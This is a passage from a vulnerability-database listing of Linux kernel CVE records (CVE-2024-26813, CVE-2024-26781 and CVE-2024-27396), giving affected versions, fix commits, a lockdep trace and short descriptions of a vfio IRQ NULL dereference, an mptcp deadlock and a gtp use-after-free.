"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "07afdfd8a68f9eea8db0ddc4626c874f29d2ac5e",
"status": "affected",
"version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
"versionType": "git"
},
{
"lessThan": "09452c8fcbd7817c06e8e3212d99b45917e603a5",
"status": "affected",
"version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
"versionType": "git"
},
{
"lessThan": "cc5838f19d39a5fef04c468199699d2a4578be3a",
"status": "affected",
"version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
"versionType": "git"
},
{
"lessThan": "7932db06c82c5b2f42a4d1a849d97dba9ce4a362",
"status": "affected",
"version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
"versionType": "git"
},
{
"lessThan": "62d4e43a569b67929eb3319780be5359694c8086",
"status": "affected",
"version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
"versionType": "git"
},
{
"lessThan": "d6bedd6acc0bcb1e7e010bc046032e47f08d379f",
"status": "affected",
"version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
"versionType": "git"
},
{
"lessThan": "0f8d8f9c2173a541812dd750529f4a415117eb29",
"status": "affected",
"version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
"versionType": "git"
},
{
"lessThan": "675daf435e9f8e5a5eab140a9864dfad6668b375",
"status": "affected",
"version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/vfio/platform/vfio_platform_irq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.1"
},
{
"lessThan": "4.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/platform: Create persistent IRQ handlers\n\nThe vfio-platform SET_IRQS ioctl currently allows loopback triggering of\nan interrupt before a signaling eventfd has been configured by the user,\nwhich thereby allows a NULL pointer dereference.\n\nRather than register the IRQ relative to a valid trigger, register all\nIRQs in a disabled state in the device open path. This allows mask\noperations on the IRQ to nest within the overall enable state governed\nby a valid eventfd signal. This decouples @masked, protected by the\n@locked spinlock from @trigger, protected via the @igate mutex.\n\nIn doing so, it\u0027s guaranteed that changes to @trigger cannot race the\nIRQ handlers because the IRQ handler is synchronously disabled before\nmodifying the trigger, and loopback triggering of the IRQ via ioctl is\nsafe due to serialization with trigger changes via igate.\n\nFor compatibility, request_irq() failures are maintained to be local to\nthe SET_IRQS ioctl rather than a fatal error in the open device path.\nThis allows, for example, a userspace driver with polling mode support\nto continue to work regardless of moving the request_irq() call site.\nThis necessarily blocks all SET_IRQS access to the failed index."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:08.928Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/07afdfd8a68f9eea8db0ddc4626c874f29d2ac5e"
},
{
"url": "https://git.kernel.org/stable/c/09452c8fcbd7817c06e8e3212d99b45917e603a5"
},
{
"url": "https://git.kernel.org/stable/c/cc5838f19d39a5fef04c468199699d2a4578be3a"
},
{
"url": "https://git.kernel.org/stable/c/7932db06c82c5b2f42a4d1a849d97dba9ce4a362"
},
{
"url": "https://git.kernel.org/stable/c/62d4e43a569b67929eb3319780be5359694c8086"
},
{
"url": "https://git.kernel.org/stable/c/d6bedd6acc0bcb1e7e010bc046032e47f08d379f"
},
{
"url": "https://git.kernel.org/stable/c/0f8d8f9c2173a541812dd750529f4a415117eb29"
},
{
"url": "https://git.kernel.org/stable/c/675daf435e9f8e5a5eab140a9864dfad6668b375"
}
],
"title": "vfio/platform: Create persistent IRQ handlers",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26813",
"datePublished": "2024-04-05T08:24:43.279Z",
"dateReserved": "2024-02-19T14:20:24.180Z",
"dateUpdated": "2025-05-04T08:57:08.928Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26781 (GCVE-0-2024-26781)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mptcp: fix possible deadlock in subflow diag
Syzbot and Eric reported a lockdep splat in the subflow diag:
WARNING: possible circular locking dependency detected
6.8.0-rc4-syzkaller-00212-g40b9385dd8e6 #0 Not tainted
syz-executor.2/24141 is trying to acquire lock:
ffff888045870130 (k-sk_lock-AF_INET6){+.+.}-{0:0}, at:
tcp_diag_put_ulp net/ipv4/tcp_diag.c:100 [inline]
ffff888045870130 (k-sk_lock-AF_INET6){+.+.}-{0:0}, at:
tcp_diag_get_aux+0x738/0x830 net/ipv4/tcp_diag.c:137
but task is already holding lock:
ffffc9000135e488 (&h->lhash2[i].lock){+.+.}-{2:2}, at: spin_lock
include/linux/spinlock.h:351 [inline]
ffffc9000135e488 (&h->lhash2[i].lock){+.+.}-{2:2}, at:
inet_diag_dump_icsk+0x39f/0x1f80 net/ipv4/inet_diag.c:1038
which lock already depends on the new lock.
the existing dependency chain (in reverse order) is:
-> #1 (&h->lhash2[i].lock){+.+.}-{2:2}:
lock_acquire+0x1e3/0x530 kernel/locking/lockdep.c:5754
__raw_spin_lock include/linux/spinlock_api_smp.h:133 [inline]
_raw_spin_lock+0x2e/0x40 kernel/locking/spinlock.c:154
spin_lock include/linux/spinlock.h:351 [inline]
__inet_hash+0x335/0xbe0 net/ipv4/inet_hashtables.c:743
inet_csk_listen_start+0x23a/0x320 net/ipv4/inet_connection_sock.c:1261
__inet_listen_sk+0x2a2/0x770 net/ipv4/af_inet.c:217
inet_listen+0xa3/0x110 net/ipv4/af_inet.c:239
rds_tcp_listen_init+0x3fd/0x5a0 net/rds/tcp_listen.c:316
rds_tcp_init_net+0x141/0x320 net/rds/tcp.c:577
ops_init+0x352/0x610 net/core/net_namespace.c:136
__register_pernet_operations net/core/net_namespace.c:1214 [inline]
register_pernet_operations+0x2cb/0x660 net/core/net_namespace.c:1283
register_pernet_device+0x33/0x80 net/core/net_namespace.c:1370
rds_tcp_init+0x62/0xd0 net/rds/tcp.c:735
do_one_initcall+0x238/0x830 init/main.c:1236
do_initcall_level+0x157/0x210 init/main.c:1298
do_initcalls+0x3f/0x80 init/main.c:1314
kernel_init_freeable+0x42f/0x5d0 init/main.c:1551
kernel_init+0x1d/0x2a0 init/main.c:1441
ret_from_fork+0x4b/0x80 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x1b/0x30 arch/x86/entry/entry_64.S:242
-> #0 (k-sk_lock-AF_INET6){+.+.}-{0:0}:
check_prev_add kernel/locking/lockdep.c:3134 [inline]
check_prevs_add kernel/locking/lockdep.c:3253 [inline]
validate_chain+0x18ca/0x58e0 kernel/locking/lockdep.c:3869
__lock_acquire+0x1345/0x1fd0 kernel/locking/lockdep.c:5137
lock_acquire+0x1e3/0x530 kernel/locking/lockdep.c:5754
lock_sock_fast include/net/sock.h:1723 [inline]
subflow_get_info+0x166/0xd20 net/mptcp/diag.c:28
tcp_diag_put_ulp net/ipv4/tcp_diag.c:100 [inline]
tcp_diag_get_aux+0x738/0x830 net/ipv4/tcp_diag.c:137
inet_sk_diag_fill+0x10ed/0x1e00 net/ipv4/inet_diag.c:345
inet_diag_dump_icsk+0x55b/0x1f80 net/ipv4/inet_diag.c:1061
__inet_diag_dump+0x211/0x3a0 net/ipv4/inet_diag.c:1263
inet_diag_dump_compat+0x1c1/0x2d0 net/ipv4/inet_diag.c:1371
netlink_dump+0x59b/0xc80 net/netlink/af_netlink.c:2264
__netlink_dump_start+0x5df/0x790 net/netlink/af_netlink.c:2370
netlink_dump_start include/linux/netlink.h:338 [inline]
inet_diag_rcv_msg_compat+0x209/0x4c0 net/ipv4/inet_diag.c:1405
sock_diag_rcv_msg+0xe7/0x410
netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2543
sock_diag_rcv+0x2a/0x40 net/core/sock_diag.c:280
netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]
netlink_unicast+0x7ea/0x980 net/netlink/af_netlink.c:1367
netlink_sendmsg+0xa3b/0xd70 net/netlink/af_netlink.c:1908
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x221/0x270 net/socket.c:745
____sys_sendmsg+0x525/0x7d0 net/socket.c:2584
___sys_sendmsg net/socket.c:2638 [inline]
__sys_sendmsg+0x2b0/0x3a0 net/socket.c:2667
do_syscall_64+0xf9/0x240
entry_SYSCALL_64_after_hwframe+0x6f/0x77
As noted by Eric we can break the lock dependency chain avoid
dumping
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8affdbb3e2ef6b6a3a467b87dc336dc601dc2ed9 Version: 7d6e8d7ee13b876e762b11f4ec210876ab7aec84 Version: 71787c665d09a970b9280c285181d3a2d1bf3bb0 Version: e074c8297ee421e7ff352404262fe0e042954ab7 Version: 298ac00da8e6bc2dcd690b45108acbd944c347d3 Version: b8adb69a7d29c2d33eb327bca66476fb6066516b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26781",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-04T15:25:28.472646Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:22.582Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.451Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70e5b013538d5e4cb421afed431a5fcd2a5d49ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cc32ba2fdf3f8b136619fff551f166ba51ec856d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f27d319df055629480b84b9288a502337b6f2a2e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa8c776f4c323a9fbc8ddf25edcb962083391430"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d487e7ba1bc7444d5f062c4930ef8436c47c7e63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d6a9608af9a75d13243d217f6ce1e30e57d56ffe"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mptcp/diag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "70e5b013538d5e4cb421afed431a5fcd2a5d49ee",
"status": "affected",
"version": "8affdbb3e2ef6b6a3a467b87dc336dc601dc2ed9",
"versionType": "git"
},
{
"lessThan": "cc32ba2fdf3f8b136619fff551f166ba51ec856d",
"status": "affected",
"version": "7d6e8d7ee13b876e762b11f4ec210876ab7aec84",
"versionType": "git"
},
{
"lessThan": "f27d319df055629480b84b9288a502337b6f2a2e",
"status": "affected",
"version": "71787c665d09a970b9280c285181d3a2d1bf3bb0",
"versionType": "git"
},
{
"lessThan": "fa8c776f4c323a9fbc8ddf25edcb962083391430",
"status": "affected",
"version": "e074c8297ee421e7ff352404262fe0e042954ab7",
"versionType": "git"
},
{
"lessThan": "d487e7ba1bc7444d5f062c4930ef8436c47c7e63",
"status": "affected",
"version": "298ac00da8e6bc2dcd690b45108acbd944c347d3",
"versionType": "git"
},
{
"lessThan": "d6a9608af9a75d13243d217f6ce1e30e57d56ffe",
"status": "affected",
"version": "b8adb69a7d29c2d33eb327bca66476fb6066516b",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mptcp/diag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.10.212",
"status": "affected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThan": "5.15.151",
"status": "affected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThan": "6.1.81",
"status": "affected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThan": "6.6.21",
"status": "affected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThan": "6.7.9",
"status": "affected",
"version": "6.7.7",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "6.7.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix possible deadlock in subflow diag\n\nSyzbot and Eric reported a lockdep splat in the subflow diag:\n\n WARNING: possible circular locking dependency detected\n 6.8.0-rc4-syzkaller-00212-g40b9385dd8e6 #0 Not tainted\n\n syz-executor.2/24141 is trying to acquire lock:\n ffff888045870130 (k-sk_lock-AF_INET6){+.+.}-{0:0}, at:\n tcp_diag_put_ulp net/ipv4/tcp_diag.c:100 [inline]\n ffff888045870130 (k-sk_lock-AF_INET6){+.+.}-{0:0}, at:\n tcp_diag_get_aux+0x738/0x830 net/ipv4/tcp_diag.c:137\n\n but task is already holding lock:\n ffffc9000135e488 (\u0026h-\u003elhash2[i].lock){+.+.}-{2:2}, at: spin_lock\n include/linux/spinlock.h:351 [inline]\n ffffc9000135e488 (\u0026h-\u003elhash2[i].lock){+.+.}-{2:2}, at:\n inet_diag_dump_icsk+0x39f/0x1f80 net/ipv4/inet_diag.c:1038\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #1 (\u0026h-\u003elhash2[i].lock){+.+.}-{2:2}:\n lock_acquire+0x1e3/0x530 kernel/locking/lockdep.c:5754\n __raw_spin_lock include/linux/spinlock_api_smp.h:133 [inline]\n _raw_spin_lock+0x2e/0x40 kernel/locking/spinlock.c:154\n spin_lock include/linux/spinlock.h:351 [inline]\n __inet_hash+0x335/0xbe0 net/ipv4/inet_hashtables.c:743\n inet_csk_listen_start+0x23a/0x320 net/ipv4/inet_connection_sock.c:1261\n __inet_listen_sk+0x2a2/0x770 net/ipv4/af_inet.c:217\n inet_listen+0xa3/0x110 net/ipv4/af_inet.c:239\n rds_tcp_listen_init+0x3fd/0x5a0 net/rds/tcp_listen.c:316\n rds_tcp_init_net+0x141/0x320 net/rds/tcp.c:577\n ops_init+0x352/0x610 net/core/net_namespace.c:136\n __register_pernet_operations net/core/net_namespace.c:1214 [inline]\n register_pernet_operations+0x2cb/0x660 net/core/net_namespace.c:1283\n register_pernet_device+0x33/0x80 net/core/net_namespace.c:1370\n rds_tcp_init+0x62/0xd0 net/rds/tcp.c:735\n do_one_initcall+0x238/0x830 init/main.c:1236\n do_initcall_level+0x157/0x210 init/main.c:1298\n do_initcalls+0x3f/0x80 init/main.c:1314\n kernel_init_freeable+0x42f/0x5d0 init/main.c:1551\n kernel_init+0x1d/0x2a0 init/main.c:1441\n ret_from_fork+0x4b/0x80 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x1b/0x30 arch/x86/entry/entry_64.S:242\n\n -\u003e #0 (k-sk_lock-AF_INET6){+.+.}-{0:0}:\n check_prev_add kernel/locking/lockdep.c:3134 [inline]\n check_prevs_add kernel/locking/lockdep.c:3253 [inline]\n validate_chain+0x18ca/0x58e0 kernel/locking/lockdep.c:3869\n __lock_acquire+0x1345/0x1fd0 kernel/locking/lockdep.c:5137\n lock_acquire+0x1e3/0x530 kernel/locking/lockdep.c:5754\n lock_sock_fast include/net/sock.h:1723 [inline]\n subflow_get_info+0x166/0xd20 net/mptcp/diag.c:28\n tcp_diag_put_ulp net/ipv4/tcp_diag.c:100 [inline]\n tcp_diag_get_aux+0x738/0x830 net/ipv4/tcp_diag.c:137\n inet_sk_diag_fill+0x10ed/0x1e00 net/ipv4/inet_diag.c:345\n inet_diag_dump_icsk+0x55b/0x1f80 net/ipv4/inet_diag.c:1061\n __inet_diag_dump+0x211/0x3a0 net/ipv4/inet_diag.c:1263\n inet_diag_dump_compat+0x1c1/0x2d0 net/ipv4/inet_diag.c:1371\n netlink_dump+0x59b/0xc80 net/netlink/af_netlink.c:2264\n __netlink_dump_start+0x5df/0x790 net/netlink/af_netlink.c:2370\n netlink_dump_start include/linux/netlink.h:338 [inline]\n inet_diag_rcv_msg_compat+0x209/0x4c0 net/ipv4/inet_diag.c:1405\n sock_diag_rcv_msg+0xe7/0x410\n netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2543\n sock_diag_rcv+0x2a/0x40 net/core/sock_diag.c:280\n netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]\n netlink_unicast+0x7ea/0x980 net/netlink/af_netlink.c:1367\n netlink_sendmsg+0xa3b/0xd70 net/netlink/af_netlink.c:1908\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x221/0x270 net/socket.c:745\n ____sys_sendmsg+0x525/0x7d0 net/socket.c:2584\n ___sys_sendmsg net/socket.c:2638 [inline]\n __sys_sendmsg+0x2b0/0x3a0 net/socket.c:2667\n do_syscall_64+0xf9/0x240\n entry_SYSCALL_64_after_hwframe+0x6f/0x77\n\nAs noted by Eric we can break the lock dependency chain avoid\ndumping \n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:22.085Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/70e5b013538d5e4cb421afed431a5fcd2a5d49ee"
},
{
"url": "https://git.kernel.org/stable/c/cc32ba2fdf3f8b136619fff551f166ba51ec856d"
},
{
"url": "https://git.kernel.org/stable/c/f27d319df055629480b84b9288a502337b6f2a2e"
},
{
"url": "https://git.kernel.org/stable/c/fa8c776f4c323a9fbc8ddf25edcb962083391430"
},
{
"url": "https://git.kernel.org/stable/c/d487e7ba1bc7444d5f062c4930ef8436c47c7e63"
},
{
"url": "https://git.kernel.org/stable/c/d6a9608af9a75d13243d217f6ce1e30e57d56ffe"
}
],
"title": "mptcp: fix possible deadlock in subflow diag",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26781",
"datePublished": "2024-04-04T08:20:15.775Z",
"dateReserved": "2024-02-19T14:20:24.177Z",
"dateUpdated": "2025-05-04T08:56:22.085Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27396 (GCVE-0-2024-27396)
Vulnerability from cvelistv5
Published
2024-05-09 16:37
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: gtp: Fix Use-After-Free in gtp_dellink
Since call_rcu, which is called in the hlist_for_each_entry_rcu traversal
of gtp_dellink, is not part of the RCU read critical section, it
is possible that the RCU grace period will pass during the traversal and
the key will be free.
To prevent this, it should be changed to hlist_for_each_entry_safe.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 043a283d24f40fea4c8a8d06b0e2694c8e372200 Version: c185e1d6e2752a4b656c3ca878c525fa11f55757 Version: 94dc550a5062030569d4aa76e10e50c8fc001930 Version: 94dc550a5062030569d4aa76e10e50c8fc001930 Version: 94dc550a5062030569d4aa76e10e50c8fc001930 Version: 94dc550a5062030569d4aa76e10e50c8fc001930 Version: 94dc550a5062030569d4aa76e10e50c8fc001930 Version: 94dc550a5062030569d4aa76e10e50c8fc001930 Version: a29c4303930bc0c25ae6a4f365dcdef71447b4ea |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27396",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T15:23:40.567279Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:11.173Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.256Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07b20d0a3dc13fb1adff10b60021a4924498da58"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/718df1bc226c383dd803397d7f5d95557eb81ac7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0caff3e6390f840666b8dc1ecebf985c2ef3f1dd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e74b3fd6bf542349758f283676dff3660327c07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25a1c2d4b1fcf938356a9688a96a6456abd44b29"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2aacd4de45477582993f8a8abb9505a06426bfb6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd957d1716ec979d8f5bf38fc659aeb9fdaa2474"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2a904107ee2b647bb7794a1a82b67740d7c8a64"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/gtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "07b20d0a3dc13fb1adff10b60021a4924498da58",
"status": "affected",
"version": "043a283d24f40fea4c8a8d06b0e2694c8e372200",
"versionType": "git"
},
{
"lessThan": "718df1bc226c383dd803397d7f5d95557eb81ac7",
"status": "affected",
"version": "c185e1d6e2752a4b656c3ca878c525fa11f55757",
"versionType": "git"
},
{
"lessThan": "0caff3e6390f840666b8dc1ecebf985c2ef3f1dd",
"status": "affected",
"version": "94dc550a5062030569d4aa76e10e50c8fc001930",
"versionType": "git"
},
{
"lessThan": "2e74b3fd6bf542349758f283676dff3660327c07",
"status": "affected",
"version": "94dc550a5062030569d4aa76e10e50c8fc001930",
"versionType": "git"
},
{
"lessThan": "25a1c2d4b1fcf938356a9688a96a6456abd44b29",
"status": "affected",
"version": "94dc550a5062030569d4aa76e10e50c8fc001930",
"versionType": "git"
},
{
"lessThan": "2aacd4de45477582993f8a8abb9505a06426bfb6",
"status": "affected",
"version": "94dc550a5062030569d4aa76e10e50c8fc001930",
"versionType": "git"
},
{
"lessThan": "cd957d1716ec979d8f5bf38fc659aeb9fdaa2474",
"status": "affected",
"version": "94dc550a5062030569d4aa76e10e50c8fc001930",
"versionType": "git"
},
{
"lessThan": "f2a904107ee2b647bb7794a1a82b67740d7c8a64",
"status": "affected",
"version": "94dc550a5062030569d4aa76e10e50c8fc001930",
"versionType": "git"
},
{
"status": "affected",
"version": "a29c4303930bc0c25ae6a4f365dcdef71447b4ea",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/gtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.19.93",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.5",
